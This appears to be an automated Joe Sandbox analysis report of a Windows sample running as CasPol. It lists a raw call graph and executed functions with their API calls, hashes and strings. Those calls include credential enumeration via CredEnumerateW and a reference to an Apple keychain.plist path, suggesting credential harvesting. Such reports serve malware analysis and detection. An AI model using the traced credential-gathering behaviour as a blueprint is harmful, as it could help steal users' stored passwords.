43b47e 39911 43b497 39906->39911 40078 42374a memcpy memset memcpy memcpy memcpy 39906->40078 39907 43b544 39912 43b55c 39907->39912 40084 42c02e memset 39907->40084 39908 43b428 39908->39901 40076 432b60 16 API calls 39908->40076 39909 43afca 40039 423330 11 API calls 39909->40039 40079 4233ae 11 API calls 39911->40079 40085 43a87a 163 API calls 39912->40085 39913 43afdb 40040 4233ae 11 API calls 39913->40040 39919 43b56c 39922 43b58a 39919->39922 40086 423330 11 API calls 39919->40086 39920 43b4b1 40080 423399 11 API calls 39920->40080 39921 43afee 40041 44081d 163 API calls 39921->40041 40087 440f84 12 API calls 39922->40087 39927 43b4c1 40089 42db80 163 API calls 39927->40089 39929 43b592 40088 43a82f 16 API calls 39929->40088 39932 43b5b4 40090 438c4e 163 API calls 39932->40090 39934 43b5cf 40091 42c02e memset 39934->40091 39936 43b005 39936->39831 39940 43b01f 39936->39940 40042 42d836 163 API calls 39936->40042 39937 43b1ef 40052 4233c5 16 API calls 39937->40052 39940->39937 40050 423330 11 API calls 39940->40050 40051 42d71d 163 API calls 39940->40051 39941 43b212 40053 423330 11 API calls 39941->40053 39942 43b087 40043 4233ae 11 API calls 39942->40043 39943 43add4 39943->39886 40092 438f86 16 API calls 39943->40092 39948 43b22a 40054 42ccb5 11 API calls 39948->40054 39950 43b23f 40055 4233ae 11 API calls 39950->40055 39951 43b10f 40046 423330 11 API calls 39951->40046 39953 43b257 40056 4233ae 11 API calls 39953->40056 39957 43b129 40047 4233ae 11 API calls 39957->40047 39958 43b26e 40057 4233ae 11 API calls 39958->40057 39961 43b09a 39961->39951 40044 42cc15 19 API calls 39961->40044 40045 4233ae 11 API calls 39961->40045 39962 43b282 40058 43a87a 163 API calls 39962->40058 39964 43b13c 40048 440f84 12 API calls 39964->40048 39966 43b29d 40059 423330 11 API calls 39966->40059 39969 43b15f 40049 4233ae 11 API calls 39969->40049 39970 43b2af 39972 43b2b8 39970->39972 39973 43b2ce 39970->39973 40060 4233ae 11 API calls 39972->40060 40061 440f84 12 API calls 39973->40061 39976 43b2c9 40063 4233ae 11 API calls 39976->40063 39977 43b2da 40062 42370b memset memcpy memset 39977->40062 39980 43b2f9 40064 423330 11 API calls 39980->40064 39982 43b30b 40065 423330 11 API calls 39982->40065 39984 43b325 40066 423399 11 API calls 39984->40066 39986 43b332 40067 4233ae 11 API calls 39986->40067 39988 43b354 40068 423399 11 API calls 39988->40068 39990 43b364 40069 43a82f 16 API calls 39990->40069 39992 43b370 40070 42db80 163 API calls 39992->40070 39994 43b380 40071 438c4e 163 API calls 39994->40071 39996 43b39e 40072 423399 11 API calls 39996->40072 39998 43b3ae 40073 43a76c 21 API calls 39998->40073 40000 43b3c3 40074 423399 11 API calls 40000->40074 40002->39823 40003->39825 40004->39828 40006 43a6f5 40005->40006 40007 43a765 40005->40007 40006->40007 40094 42a115 40006->40094 40007->39831 40014 4397fd memset 40007->40014 40011 43a73d 40011->40007 40012 42a115 147 API calls 40011->40012 40012->40007 40013->39833 40014->39840 40015->39831 40016->39855 40017->39844 40018->39849 40019->39845 40020->39848 40021->39853 40022->39857 40023->39859 40024->39863 40025->39871 40026->39868 40027->39872 40028->39943 40029->39865 40030->39873 40031->39877 40032->39878 40033->39878 40034->39887 40035->39891 40036->39895 40037->39902 40038->39909 40039->39913 40040->39921 40041->39936 40042->39942 40043->39961 40044->39961 40045->39961 40046->39957 40047->39964 40048->39969 40049->39940 40050->39940 40051->39940 40052->39941 40053->39948 40054->39950 40055->39953 40056->39958 40057->39962 40058->39966 40059->39970 40060->39976 40061->39977 40062->39976 40063->39980 40064->39982 40065->39984 40066->39986 40067->39988 40068->39990 40069->39992 40070->39994 40071->39996 40072->39998 40073->40000 40074->39943 40075->39908 40076->39901 40077->39906 40078->39911 40079->39920 40080->39927 40081->39899 40082->39900 40083->39907 40084->39912 40085->39919 40086->39922 40087->39929 40088->39927 40089->39932 40090->39934 40091->39943 40092->39886 40093->39831 40095 42a175 40094->40095 40097 42a122 40094->40097 40095->40007 40100 42b13b 147 API calls 40095->40100 40097->40095 40098 42a115 147 API calls 40097->40098 40101 43a174 40097->40101 40125 42a0a8 147 API calls 40097->40125 40098->40097 40100->40011 40115 43a196 40101->40115 40116 43a19e 40101->40116 40102 43a306 40102->40115 40145 4388c4 14 API calls 40102->40145 40105 42a115 147 API calls 40105->40116 40107 43a642 40107->40115 40149 4169a7 11 API calls 40107->40149 40111 43a635 40148 42c02e memset 40111->40148 40115->40097 40116->40102 40116->40105 40116->40115 40126 42ff8c 40116->40126 40134 415a91 40116->40134 40138 4165ff 40116->40138 40141 439504 13 API calls 40116->40141 40142 4312d0 147 API calls 40116->40142 40143 42be4c memcpy memcpy memcpy memset memcpy 40116->40143 40144 43a121 11 API calls 40116->40144 40118 4169a7 11 API calls 40119 43a325 40118->40119 40119->40107 40119->40111 40119->40115 40119->40118 40120 42b5b5 memset memcpy 40119->40120 40121 42bf4c 14 API calls 40119->40121 40124 4165ff 11 API calls 40119->40124 40146 42b63e 14 API calls 40119->40146 40147 42bfcf memcpy 40119->40147 40120->40119 40121->40119 40124->40119 40125->40097 40150 43817e 40126->40150 40128 42ff99 40129 42ffe3 40128->40129 40130 42ffd0 40128->40130 40133 42ff9d 40128->40133 40155 4169a7 11 API calls 40129->40155 40154 4169a7 11 API calls 40130->40154 40133->40116 40135 415a9d 40134->40135 40136 415ab3 40135->40136 40137 415aa4 memset 40135->40137 40136->40116 40137->40136 40302 4165a0 40138->40302 40141->40116 40142->40116 40143->40116 40144->40116 40145->40119 40146->40119 40147->40119 40148->40107 40149->40115 40151 438187 40150->40151 40153 438192 40150->40153 40156 4380f6 40151->40156 40153->40128 40154->40133 40155->40133 40158 43811f 40156->40158 40157 438164 40157->40153 40158->40157 40160 4300e8 3 API calls 40158->40160 40161 437e5e 40158->40161 40160->40158 40184 437d3c 40161->40184 40163 437eb3 40163->40158 40164 437ea9 40164->40163 40169 437f22 40164->40169 40199 41f432 40164->40199 40167 437f06 40246 415c56 11 API calls 40167->40246 40171 432d4e 3 API calls 40169->40171 40172 437f7f 40169->40172 40170 437f95 40247 415c56 11 API calls 40170->40247 40171->40172 40172->40170 40173 43802b 40172->40173 40175 4165ff 11 API calls 40173->40175 40176 438054 40175->40176 40210 437371 40176->40210 40179 43806b 40180 438094 40179->40180 40248 42f50e 138 API calls 40179->40248 40182 437fa3 40180->40182 40183 4300e8 3 API calls 40180->40183 40182->40163 40249 41f638 104 API calls 40182->40249 40183->40182 40185 437d69 40184->40185 40188 437d80 40184->40188 40250 437ccb 11 API calls 40185->40250 40187 437d76 40187->40164 40188->40187 40189 437da3 40188->40189 40191 437d90 40188->40191 40192 438460 134 API calls 40189->40192 40191->40187 40254 437ccb 11 API calls 40191->40254 40195 437dcb 40192->40195 40193 437de8 40253 424f26 123 API calls 40193->40253 40195->40193 40251 444283 13 API calls 40195->40251 40197 437dfc 40252 437ccb 11 API calls 40197->40252 40200 41f54d 40199->40200 40206 41f44f 40199->40206 40201 41f466 40200->40201 40284 41c635 memset memset 40200->40284 40201->40167 40201->40169 40206->40201 40208 41f50b 40206->40208 40255 41f1a5 40206->40255 40280 41c06f memcmp 40206->40280 40281 41f3b1 90 API calls 40206->40281 40282 41f398 86 API calls 40206->40282 40208->40200 40208->40201 40283 41c295 86 API calls 40208->40283 40285 41703f 40210->40285 40212 437399 40213 43739d 40212->40213 40215 4373ac 40212->40215 40292 4446ea 11 API calls 40213->40292 40216 416935 16 API calls 40215->40216 40217 4373ca 40216->40217 40218 438460 134 API calls 40217->40218 40223 4251c4 137 API calls 40217->40223 40227 415a91 memset 40217->40227 40230 43758f 40217->40230 40242 437584 40217->40242 40245 437d3c 135 API calls 40217->40245 40293 425433 13 API calls 40217->40293 40294 425413 17 API calls 40217->40294 40295 42533e 16 API calls 40217->40295 40296 42538f 16 API calls 40217->40296 40297 42453e 123 API calls 40217->40297 40218->40217 40219 4375bc 40221 415c7d 16 API calls 40219->40221 40222 4375d2 40221->40222 40224 4442e6 11 API calls 40222->40224 40244 4373a7 40222->40244 40223->40217 40225 4375e2 40224->40225 40225->40244 40300 444283 13 API calls 40225->40300 40227->40217 40298 42453e 123 API calls 40230->40298 40233 4375f4 40236 437620 40233->40236 40237 43760b 40233->40237 40235 43759f 40238 416935 16 API calls 40235->40238 40240 416935 16 API calls 40236->40240 40301 444283 13 API calls 40237->40301 40238->40242 40240->40244 40242->40219 40299 42453e 123 API calls 40242->40299 40243 437612 memcpy 40243->40244 40244->40179 40245->40217 40246->40163 40247->40182 40248->40180 40249->40163 40250->40187 40251->40197 40252->40193 40253->40187 40254->40187 40256 41bc3b 101 API calls 40255->40256 40257 41f1b4 40256->40257 40258 41edad 86 API calls 40257->40258 40265 41f282 40257->40265 40259 41f1cb 40258->40259 40260 41f1f5 memcmp 40259->40260 40261 41f20e 40259->40261 40259->40265 40260->40261 40262 41f21b memcmp 40261->40262 40261->40265 40263 41f326 40262->40263 40266 41f23d 40262->40266 40264 41ee6b 86 API calls 40263->40264 40263->40265 40264->40265 40265->40206 40266->40263 40267 41f28e memcmp 40266->40267 40269 41c8df 56 API calls 40266->40269 40267->40263 40268 41f2a9 40267->40268 40268->40263 40271 41f308 40268->40271 40272 41f2d8 40268->40272 40270 41f269 40269->40270 40270->40263 40273 41f287 40270->40273 40274 41f27a 40270->40274 40271->40263 40278 4446ce 11 API calls 40271->40278 40275 41ee6b 86 API calls 40272->40275 40273->40267 40276 41ee6b 86 API calls 40274->40276 40277 41f2e0 40275->40277 40276->40265 40279 41b1ca memset 40277->40279 40278->40263 40279->40265 40280->40206 40281->40206 40282->40206 40283->40200 40284->40201 40286 417044 40285->40286 40287 41705c 40285->40287 40289 416760 11 API calls 40286->40289 40291 417055 40286->40291 40288 417075 40287->40288 40290 41707a 11 API calls 40287->40290 40288->40212 40289->40291 40290->40286 40291->40212 40292->40244 40293->40217 40294->40217 40295->40217 40296->40217 40297->40217 40298->40235 40299->40219 40300->40233 40301->40243 40307 415cfe 40302->40307 40311 415d23 __aullrem __aulldvrm 40307->40311 40314 41628e 40307->40314 40308 4163ca 40321 416422 11 API calls 40308->40321 40310 416172 memset 40310->40311 40311->40308 40311->40310 40312 416422 10 API calls 40311->40312 40313 415cb9 10 API calls 40311->40313 40311->40314 40312->40311 40313->40311 40315 416520 40314->40315 40316 416527 40315->40316 40320 416574 40315->40320 40317 416544 40316->40317 40316->40320 40322 4156aa 11 API calls 40316->40322 40319 416561 memcpy 40317->40319 40317->40320 40319->40320 40320->40116 40321->40314 40322->40317 40354 41493c EnumResourceNamesW 37671 4287c1 37672 4287d2 37671->37672 37673 429ac1 37671->37673 37674 428818 37672->37674 37675 42881f 37672->37675 37690 425711 37672->37690 37685 425ad6 37673->37685 37741 415c56 11 API calls 37673->37741 37708 42013a 37674->37708 37736 420244 97 API calls 37675->37736 37680 4260dd 37735 424251 120 API calls 37680->37735 37682 4259da 37734 416760 11 API calls 37682->37734 37688 422aeb memset memcpy memcpy 37688->37690 37689 429a4d 37691 429a66 37689->37691 37695 429a9b 37689->37695 37690->37673 37690->37682 37690->37688 37690->37689 37693 4260a1 37690->37693 37704 4259c2 37690->37704 37707 425a38 37690->37707 37724 4227f0 memset memcpy 37690->37724 37725 422b84 15 API calls 37690->37725 37726 422b5d memset memcpy memcpy 37690->37726 37727 422640 13 API calls 37690->37727 37729 4241fc 11 API calls 37690->37729 37730 42413a 90 API calls 37690->37730 37737 415c56 11 API calls 37691->37737 37733 415c56 11 API calls 37693->37733 37696 429a96 37695->37696 37739 416760 11 API calls 37695->37739 37740 424251 120 API calls 37696->37740 37698 429a7a 37738 416760 11 API calls 37698->37738 37704->37685 37728 415c56 11 API calls 37704->37728 37707->37704 37731 422640 13 API calls 37707->37731 37732 4226e0 12 API calls 37707->37732 37709 42014c 37708->37709 37712 420151 37708->37712 37751 41e466 97 API calls 37709->37751 37711 420162 37711->37690 37712->37711 37713 4201b3 37712->37713 37714 420229 37712->37714 37715 4201b8 37713->37715 37716 4201dc 37713->37716 37714->37711 37717 41fd5e 86 API calls 37714->37717 37742 41fbdb 37715->37742 37716->37711 37720 4201ff 37716->37720 37748 41fc4c 37716->37748 37717->37711 37720->37711 37723 42013a 97 API calls 37720->37723 37723->37711 37724->37690 37725->37690 37726->37690 37727->37690 37728->37682 37729->37690 37730->37690 37731->37707 37732->37707 37733->37682 37734->37680 37735->37685 37736->37690 37737->37698 37738->37696 37739->37696 37740->37673 37741->37682 37743 41fbf1 37742->37743 37744 41fbf8 37742->37744 37747 41fc39 37743->37747 37766 4446ce 11 API calls 37743->37766 37756 41ee26 37744->37756 37747->37711 37752 41fd5e 37747->37752 37749 41ee6b 86 API calls 37748->37749 37750 41fc5d 37749->37750 37750->37716 37751->37712 37754 41fd65 37752->37754 37753 41fdab 37753->37711 37754->37753 37755 41fbdb 86 API calls 37754->37755 37755->37754 37757 41ee41 37756->37757 37758 41ee32 37756->37758 37767 41edad 37757->37767 37770 4446ce 11 API calls 37758->37770 37762 41ee3c 37762->37743 37764 41ee58 37764->37762 37772 41ee6b 37764->37772 37766->37747 37776 41be52 37767->37776 37770->37762 37771 41eb85 11 API calls 37771->37764 37773 41ee70 37772->37773 37774 41ee78 37772->37774 37829 41bf99 86 API calls 37773->37829 37774->37762 37777 41be6f 37776->37777 37778 41be5f 37776->37778 37783 41be8c 37777->37783 37808 418c63 memset memset 37777->37808 37807 4446ce 11 API calls 37778->37807 37780 41be69 37780->37762 37780->37771 37782 41bee7 37782->37780 37812 41a453 86 API calls 37782->37812 37783->37780 37783->37782 37784 41bf3a 37783->37784 37786 41bed1 37783->37786 37811 4446ce 11 API calls 37784->37811 37788 41bef0 37786->37788 37791 41bee2 37786->37791 37788->37782 37790 41bf01 37788->37790 37789 41bf24 memset 37789->37780 37790->37789 37792 41bf14 37790->37792 37809 418a6d memset memcpy memset 37790->37809 37797 41ac13 37791->37797 37810 41a223 memset memcpy memset 37792->37810 37796 41bf20 37796->37789 37798 41ac3f memset 37797->37798 37800 41ac52 37797->37800 37799 41acd9 37798->37799 37799->37782 37802 41ac6a 37800->37802 37813 41dc14 19 API calls 37800->37813 37803 41aca1 37802->37803 37814 41519d 37802->37814 37803->37799 37805 41acc0 memset 37803->37805 37806 41accd memcpy 37803->37806 37805->37799 37806->37799 37807->37780 37808->37783 37809->37792 37810->37796 37811->37782 37813->37802 37817 4175ed 37814->37817 37825 417570 SetFilePointer 37817->37825 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37823 4151b3 37821->37823 37824 41763e memset 37821->37824 37822->37823 37823->37803 37824->37823 37826 4175b2 37825->37826 37827 41759c GetLastError 37825->37827 37826->37820 37826->37823 37827->37826 37828 4175a8 GetLastError 37827->37828 37828->37826 37829->37774 37830 417bc5 37831 417c61 37830->37831 37836 417bda 37830->37836 37832 417bf6 UnmapViewOfFile CloseHandle 37832->37832 37832->37836 37834 417c2c 37834->37836 37842 41851e 20 API calls 37834->37842 37836->37831 37836->37832 37836->37834 37837 4175b7 37836->37837 37838 4175d6 CloseHandle 37837->37838 37839 4175c8 37838->37839 37840 4175df 37838->37840 37839->37840 37841 4175ce Sleep 37839->37841 37840->37836 37841->37838 37842->37834 39805 4147f3 39808 414561 39805->39808 39807 414813 39809 41456d 39808->39809 39810 41457f GetPrivateProfileIntW 39808->39810 39813 4143f1 memset _itow WritePrivateProfileStringW 39809->39813 39810->39807 39812 41457a 39812->39807 39813->39812

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                  • API String ID: 2263259095-3798722523
                                                                                                                                                                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
